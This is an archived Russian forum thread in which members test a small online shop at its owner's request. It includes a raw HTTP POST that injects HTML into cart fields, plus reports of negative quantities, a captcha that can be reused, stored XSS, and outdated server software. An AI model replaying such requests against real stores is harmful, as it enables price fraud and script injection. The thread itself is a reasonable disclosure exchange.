PDA

Просмотр полной версии : Инет-магазин

SleepShadowWeb
05.01.2008, 18:57
сайт самописный, форумы не смотреть.
проверял Spider`ом вроде особо не находил такого критичного.
но для полной уверенности прошу Вашей помощи.
адрес сайта: http://green-leaf.ru/1/index1.php
d_x
29.03.2008, 04:45
Пока нашёл, то что можно добавить в корзину отрицательное число товаров.
Ponchik
29.03.2008, 11:50
XSS
хз как я это сделал, я так нелюблю в аяксе копаться поэтому запросы редактировал
http://img150.imageshack.us/img150/7599/screenshot131re6.jpg
POST http://green-leaf.ru/1/data/188.php HTTP/1.0
Method: POST http://green-leaf.ru/1/data/188.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Opera/9.26 (Windows NT 5.1; U; ru)
Host: green-leaf.ru
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Referer: http://green-leaf.ru/1/data/188.php
Cookie: prices_korzina=d80804d682988ec69ef6773be58b3044; Apache=86.106.217.37.377191206776053497
Cookie2: $Version=1
Proxy-Connection: close
Content-Length: 310
Content-Transfer-Encoding: binary

xajax=setDobInKorzina&xajaxr=120677663512'&xajaxargs[]=13366'&xajaxargs[]=<h1>Hello%20:)</h1>%20LG%20DGK774%20%D1%87%D0%B5%D1%80%D0%BD%D1%8B%D0 %B9%20DVD%2BRW%2C%20DVD-R%2C%20-RW%2C%20MP3%2C%20JPEG%2C%20%D0%BA%D0%B0%D1%80%D0%B 0%D0%BE%D0%BA%D0%B5&xajaxargs[]=<h1>O_o&xajaxargs[]=''%20%D0%BC%D0%B5%D1%81%20%D1%81%2F%D1%86


В базу так и добовляется с XSSными названиями, ппц, мне пришлют если я закажу домашний кинотеатр за 1$ :D
=========================
http://green-leaf.ru/1/zakaz.php
Rfgnxf не обновляется, зажал enter он заказов 50 наверно отправил с 1 каптчи все приняты

Дальше давайте сами а я гамать иду :)
Кстати почему все товары хранятся на http://www.ultracomp.ru/ :rolleyes:
SleepShadowWeb
07.04.2008, 19:01
спасибо d_x и Ponchik
Ponchik
08.04.2008, 09:14
Чувак, тыж не исправил ничерта
http://img511.imageshack.us/img511/7903/screenshot136tc3.jpg
И когда мне её доставят? :rolleyes:

Ты передавай значения не через POST а через SESSION
AKYLA
14.06.2008, 22:53
Ну тут в основном хостинг дырявый:
PHP HTML Entity Encoder Heap Overflow Vulnerability
Unfiltered Header Injection in Apache 1.3.34/2.0.57/2.2.1
Короче надо обновить им PHP и Апач профиксить
----------------------------------------
А на сайте:
XSS
korzina.php
Переменная prices_korzina